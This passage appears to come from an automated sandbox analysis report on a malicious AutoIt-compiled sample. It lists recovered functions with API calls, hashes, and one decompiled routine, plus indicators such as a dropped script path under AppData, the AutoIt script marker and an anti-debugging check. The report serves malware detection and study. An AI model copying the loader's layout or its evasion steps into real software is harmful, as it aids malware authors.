              • Opcode Fuzzy Hash: 3307c12e21a02b209a832c1e1595ae4c26b2041413e96cbddd14025b46676f1a
              • Instruction Fuzzy Hash: F9E01779600208BFC708DFA4D846DAAB7B9EB98201F0082A8FD41D7344E671AE508BA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA48E2, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __wfsopen
              • String ID:
              • API String ID: 197181222-0
              • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
              • Instruction ID: 2e71cc339d19d27c26fc2b9a7d7977a9aa1e89e36242524b7079af27a954db08
              • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
              • Instruction Fuzzy Hash: A2C09B7244014C77CF111942EC02F493F5997C1B60F144010FB1C191619577E56195D5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA17FA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • _doexit.LIBCMT ref: 00FA1806
                • Part of subcall function 00FA16BA: __lock.LIBCMT ref: 00FA16C8
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __lock_doexit
              • String ID:
              • API String ID: 368792745-0
              • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
              • Instruction ID: 24bcb58fa5356319b4ff0f5bdb447255f791b01bd6b2382089c681e30b045ddf
              • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
              • Instruction Fuzzy Hash: E6B0927258420833DA302542EC07F063A1A97C1B60E290120BA0C192A1A9A2A9619089
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00FC3EC5, Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON
              Download Yara Rule
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FC3EE2
              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FC3EF2
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00FC3F1D
              • __wsplitpath.LIBCMT ref: 00FC3F48
                • Part of subcall function 00FA392E: __wsplitpath_helper.LIBCMT ref: 00FA3970
              • _wcscat.LIBCMT ref: 00FC3F5B
              • __wcsicoll.LIBCMT ref: 00FC3F6B
              • CloseHandle.KERNEL32(00000000), ref: 00FC3FA4
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
              • String ID:
              • API String ID: 2547909840-0
              • Opcode ID: 838676ce6abdd4df34c4692ac22f4e57ad22eed02cbc85959a31ac7e96ea798b
              • Instruction ID: 277c7e0c5a70cdee7a9b5cd4c4c90cc53ff1a54dce3b5f8dab51bfbdbdb8aeca
              • Opcode Fuzzy Hash: 838676ce6abdd4df34c4692ac22f4e57ad22eed02cbc85959a31ac7e96ea798b
              • Instruction Fuzzy Hash: 4C21D6B680020AABCB25EF50CC85FEAB7B8EB49310F10849DF54997140E775AB84CF60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FAA128, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
              Download Yara Rule
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 00FB1EE1
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FB1EF6
              • UnhandledExceptionFilter.KERNEL32(010143DC), ref: 00FB1F01
              • GetCurrentProcess.KERNEL32(C0000409), ref: 00FB1F1D
              • TerminateProcess.KERNEL32(00000000), ref: 00FB1F24
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
              • String ID:
              • API String ID: 2579439406-0
              • Opcode ID: 536bcc8e696952a40c9a1e66069a3ce9bcbc28dc2e60326c3cd3820a4d04e2b0
              • Instruction ID: e679ac201d11498fa85720872391af5cf6ffdd1dee91e42fb972e8dc96bdff7f
              • Opcode Fuzzy Hash: 536bcc8e696952a40c9a1e66069a3ce9bcbc28dc2e60326c3cd3820a4d04e2b0
              • Instruction Fuzzy Hash: D021F0B4802204DFD775DF68E9456447BA4BB2A300F70425AF58887248E7BF5888CF12
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FF8322, Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 116COMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E00FF8322(void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4) {
				char _v24;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t35;
				void* _t37;
				void* _t39;
				char* _t53;
				void* _t61;
				void* _t62;
				intOrPtr* _t64;
				void* _t77;

				_t77 = __fp0;
				_t61 = __edx;
				E00F9BEC0( &_v24, __eflags);
				_t58 =  &_v40;
				E00F9BEC0( &_v40, __eflags);
				_t64 = _a4;
				if(E00FC4A5A(_t64) != 0 || E00FA13CB(_t62,  *_t64, L"LAST") == 0) {
					_t53 = L"[LAST";
					goto L14;
				} else {
					if(E00FA13CB(_t62,  *_t64, L"ACTIVE") != 0) {
						_t33 = E00FA333F( *_t64, L"HANDLE=", 7);
						__eflags = _t33;
						if(_t33 != 0) {
							_t35 = E00FA333F( *_t64, L"REGEXP=", 7);
							__eflags = _t35;
							if(_t35 != 0) {
								_t37 = E00FA333F( *_t64, L"CLASSNAME=", 0xa);
								__eflags = _t37;
								if(_t37 != 0) {
									_t39 = E00FA13CB(_t62,  *_t64, L"ALL");
									__eflags = _t39;
									if(_t39 == 0) {
										_t53 = L"[ALL";
										goto L14;
									}
								} else {
									E00F92390( &_v24, L"[CLASS:", _t61, _t62);
									_push(0xffffffff);
									_push(0xa);
									goto L10;
								}
							} else {
								E00F92390( &_v24, L"[REGEXPTITLE:", _t61, _t62);
								_push(0xffffffff);
								_push(7);
								goto L10;
							}
						} else {
							E00F92390( &_v24, L"[HANDLE:", _t61, _t62);
							_push(0xffffffff);
							_push(7);
							L10:
							_push( &_v56);
							_push(_t64);
							E00F9DE00( &_v40, E00FF125B(__eflags));
							_t58 =  &_v56;
							E00F92480( &_v56);
							E00FF106D(__eflags, _t77,  &_v40);
							E00F9BFA0( &_v24, _t77,  &_v40);
							_t64 = _a4;
							goto L15;
						}
					} else {
						_t53 = L"[ACTIVE";
						L14:
						E00F92390( &_v24, _t53, _t61, _t62);
						L15:
						E00F91DE0( &_v24, _t58, "]", _t77);
						E00F9DE00(_t64,  &_v24);
					}
				}
				E00F92480( &_v40);
				return E00F92480( &_v24);
			}


















              0x00ff8322
              0x00ff8322
              0x00ff832e
              0x00ff8333
              0x00ff8336
              0x00ff833b
              0x00ff8346
              0x00ff8445
              0x00000000
              0x00ff8364
              0x00ff8376
              0x00ff838c
              0x00ff8394
              0x00ff8396
              0x00ff83b5
              0x00ff83bd
              0x00ff83bf
              0x00ff83de
              0x00ff83e6
              0x00ff83e8
              0x00ff8432
              0x00ff843a
              0x00ff843c
              0x00ff843e
              0x00000000
              0x00ff843e
              0x00ff83ea
              0x00ff83f2
              0x00ff83f7
              0x00ff83f9
              0x00000000
              0x00ff83f9
              0x00ff83c1
              0x00ff83c9
              0x00ff83ce
              0x00ff83d0
              0x00000000
              0x00ff83d0
              0x00ff8398
              0x00ff83a0
              0x00ff83a5
              0x00ff83a7
              0x00ff83fb
              0x00ff83fe
              0x00ff83ff
              0x00ff8409
              0x00ff840e
              0x00ff8411
              0x00ff8417
              0x00ff8420
              0x00ff8425
              0x00000000
              0x00ff8425
              0x00ff8378
              0x00ff8378
              0x00ff844a
              0x00ff844d
              0x00ff8452
              0x00ff845a
              0x00ff8463
              0x00ff8463
              0x00ff8376
              0x00ff846b
              0x00ff847e

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __wcsicoll$__wcsnicmp
              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
              • API String ID: 790654849-1810252412
              • Opcode ID: 0eb27829fa0cfa22ea78d9d70b0cb3388011097112432b66667176f694aa6e17
              • Instruction ID: 58ad5bcd4a99a1b5888777d385a75ac0bbb0650928ea67d7f81341f25bc23e55
              • Opcode Fuzzy Hash: 0eb27829fa0cfa22ea78d9d70b0cb3388011097112432b66667176f694aa6e17
              • Instruction Fuzzy Hash: BA318C71D0420D66DF10FAA0DD43FEE736CAF51751F500125FE44BB195EE2C6E05A6A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FFED23, Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00F92390: _wcslen.LIBCMT ref: 00F9239D
                • Part of subcall function 00F92390: _memmove.LIBCMT ref: 00F923C3
              • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 00FFEE0E
              • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 00FFF1FA
              • IsWindow.USER32(?), ref: 00FFF22F
              • GetDesktopWindow.USER32 ref: 00FFF2EB
              • EnumChildWindows.USER32 ref: 00FFF2F2
              • EnumWindows.USER32(00FF1059,?), ref: 00FFF2FA
                • Part of subcall function 00FD59E6: _wcslen.LIBCMT ref: 00FD59F6
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
              • API String ID: 329138477-1919597938
              • Opcode ID: bc1efdccfb683edddc289f2baceb7cae6ece23cd0b042240d2d79bf1049c2cca
              • Instruction ID: 005ce78f1ad7dc3b12a4298db961d3e494a2d0654c2d0728d8e742a3b7c86846
              • Opcode Fuzzy Hash: bc1efdccfb683edddc289f2baceb7cae6ece23cd0b042240d2d79bf1049c2cca
              • Instruction Fuzzy Hash: 84F11B729143059BCB00EF60DC82EAEB3A4BF95314F04452DF9455B267DB79E908EBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FE2833, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 172COMMON
              Download Yara Rule
              APIs
              • _fseek.LIBCMT ref: 00FE28A1
                • Part of subcall function 00FE268F: __fread_nolock.LIBCMT ref: 00FE26B4
                • Part of subcall function 00FE268F: __fread_nolock.LIBCMT ref: 00FE26F6
                • Part of subcall function 00FE268F: __fread_nolock.LIBCMT ref: 00FE2714
                • Part of subcall function 00FE268F: _wcscpy.LIBCMT ref: 00FE2748
                • Part of subcall function 00FE268F: __fread_nolock.LIBCMT ref: 00FE2758
                • Part of subcall function 00FE268F: __fread_nolock.LIBCMT ref: 00FE2776
                • Part of subcall function 00FE268F: _wcscpy.LIBCMT ref: 00FE27A7
              • __fread_nolock.LIBCMT ref: 00FE28D8
              • __fread_nolock.LIBCMT ref: 00FE28E8
              • __fread_nolock.LIBCMT ref: 00FE2901
              • __fread_nolock.LIBCMT ref: 00FE291B
              • _fseek.LIBCMT ref: 00FE2935
              • _malloc.LIBCMT ref: 00FE2940
              • _malloc.LIBCMT ref: 00FE294C
              • __fread_nolock.LIBCMT ref: 00FE295D
              • _free.LIBCMT ref: 00FE298C
              • _free.LIBCMT ref: 00FE2995
              Strings
              • C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije, xrefs: 00FE2842
              • >>>AUTOIT SCRIPT<<<, xrefs: 00FE28B0
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
              • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
              • API String ID: 1255752989-2143101004
              • Opcode ID: e8ad7e8e062dae24965009509e6b8e5a728c812fc6ee277d4f0da8f14ec30960
              • Instruction ID: 6490c9b01740ece79402435276119f8eed94f7d7d3497a6149cc093548c5b2f9
              • Opcode Fuzzy Hash: e8ad7e8e062dae24965009509e6b8e5a728c812fc6ee277d4f0da8f14ec30960
              • Instruction Fuzzy Hash: D3511EF1900218AFDB60DF69DC81B9AB7B8EF89310F1045A9F64CE7241E7759A80CF55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FC41CD, Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __wcsicoll$IconLoad
              • String ID: blank$info$question$stop$warning
              • API String ID: 2485277191-404129466
              • Opcode ID: 14c9ff86bf2bd99437a06eb951c42b0729391691b83afb0f7c858e8b8cea3e5c
              • Instruction ID: 0e618be778f33b9a82f4f8a431ebe88695686eacbcb4ce65cf240a1071d3a77e
              • Opcode Fuzzy Hash: 14c9ff86bf2bd99437a06eb951c42b0729391691b83afb0f7c858e8b8cea3e5c
              • Instruction Fuzzy Hash: CC21F872B4030666DB105E65BD07FEB339CEF55362F040436F944E618AE3AAB924A3F5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01002095, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 377timeCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 010020BD
              • _memset.LIBCMT ref: 010020DB
              • GetLocalTime.KERNEL32(?), ref: 0100225C
              • __swprintf.LIBCMT ref: 01002273
              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0101BF48), ref: 010024A6
              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0101BF48), ref: 010024C0
              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0101BF48), ref: 010024DA
              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0101BF48), ref: 010024F4
              • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0101BF48), ref: 0100250E
              • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0101BF48), ref: 01002528
              • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0101BF48), ref: 01002542
              • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0101BF48), ref: 0100255C
              • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0101BF48), ref: 01002576
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FolderPath$_memset$LocalTime__swprintf
              • String ID: %.3d
              • API String ID: 645292623-986655627
              • Opcode ID: 37e951eba6dd46312799bf232a4fc58ee12f9b0c0971c9c8325d2d493c3c53de
              • Instruction ID: 10967d6a27e5db134fd89acfe12141e8a621cab8d7082ad2fccb4fa02ad082e8
              • Opcode Fuzzy Hash: 37e951eba6dd46312799bf232a4fc58ee12f9b0c0971c9c8325d2d493c3c53de
              • Instruction Fuzzy Hash: 54C1DD72664208ABFF64EBA4DC8AFED7378FB44700F40456AF509970C2DB799E059B60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FFE7D4, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 207windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00FFE7EF
              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00FFE877
              • GetMenuItemCount.USER32 ref: 00FFE90B
              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00FFE99F
              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00FFE9A8
              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00FFE9B1
              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00FFE9BA
              • GetMenuItemCount.USER32 ref: 00FFE9C3
              • SetMenuItemInfoW.USER32 ref: 00FFE9FB
              • GetCursorPos.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00FFEA05
              • SetForegroundWindow.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00FFEA0F
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00FFEA25
              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFEA32
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
              • String ID: 0
              • API String ID: 3993528054-4108050209
              • Opcode ID: fadecbf2996fcff4e98621609f2f15c01557c52c8578f5c147ff896fa6587245
              • Instruction ID: 987441c58cd7a01c447bc515a30d414daf72b60f4c02adfb8081c06ebfe2cbf8
              • Opcode Fuzzy Hash: fadecbf2996fcff4e98621609f2f15c01557c52c8578f5c147ff896fa6587245
              • Instruction Fuzzy Hash: A571D370A04308BBE730DB54CC85FAA77A8AF85734F344719F6A56B2E1C7B8A844DB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F92190, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00F91D10: _wcslen.LIBCMT ref: 00F91D11
                • Part of subcall function 00F91D10: _memmove.LIBCMT ref: 00F91D57
              • __wcsicoll.LIBCMT ref: 00F92262
              • __wcsicoll.LIBCMT ref: 00F92278
              • __wcsicoll.LIBCMT ref: 00F9228E
                • Part of subcall function 00FA13CB: __wcsicmp_l.LIBCMT ref: 00FA144B
              • __wcsicoll.LIBCMT ref: 00F922A4
              • _wcscpy.LIBCMT ref: 00F922C4
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije,00000104), ref: 00FB8AD6
              • _wcscpy.LIBCMT ref: 00FB8B29
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije$CMDLINE$CMDLINERAW
              • API String ID: 574121520-1288043295
              • Opcode ID: 6adabf0015c928f852054300e49ac59a65ddd8a6eaf8677ba9a123ca02166672
              • Instruction ID: 3228431b2fb1481a4cdbcee78d14b960e77d61b61aa8d6871b15e7dc0f14ae28
              • Opcode Fuzzy Hash: 6adabf0015c928f852054300e49ac59a65ddd8a6eaf8677ba9a123ca02166672
              • Instruction Fuzzy Hash: 4171A171D1020A9BEF14FFE4DC52AEE77B8BF40344F410028E505AB145EB796949DBE1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FF7BBF, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 227windowsleepCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00FF7BDD
              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 00FF7C43
              • SetMenuItemInfoW.USER32 ref: 00FF7C7C
              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 00FF7C8E
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: InfoItemMenu$Sleep_memset
              • String ID: 0
              • API String ID: 1504565804-4108050209
              • Opcode ID: fda46abc35cc3a01492e72ed231aa0930a9d587a154a71098633b157b1a62eac
              • Instruction ID: f89344561703dd786b00d0c11daec123897edb98b8ea3bf7024a90631254365d
              • Opcode Fuzzy Hash: fda46abc35cc3a01492e72ed231aa0930a9d587a154a71098633b157b1a62eac
              • Instruction Fuzzy Hash: 2171D071904348ABDB20EF54DC89FBEBB68FF85320F10455AFA4587191C779A941DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FF05C5, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00FB7F37,?,0000138C,?,00000001,?,?,?), ref: 00FF05F5
              • LoadStringW.USER32(00000000,?,00FB7F37,?), ref: 00FF05FC
                • Part of subcall function 00F91D10: _wcslen.LIBCMT ref: 00F91D11
                • Part of subcall function 00F91D10: _memmove.LIBCMT ref: 00F91D57
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00FB7F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 00FF061C
              • LoadStringW.USER32(00000000,?,00FB7F37,?), ref: 00FF0623
              • __swprintf.LIBCMT ref: 00FF0661
              • __swprintf.LIBCMT ref: 00FF0679
              • _wprintf.LIBCMT ref: 00FF072D
              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FF0746
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
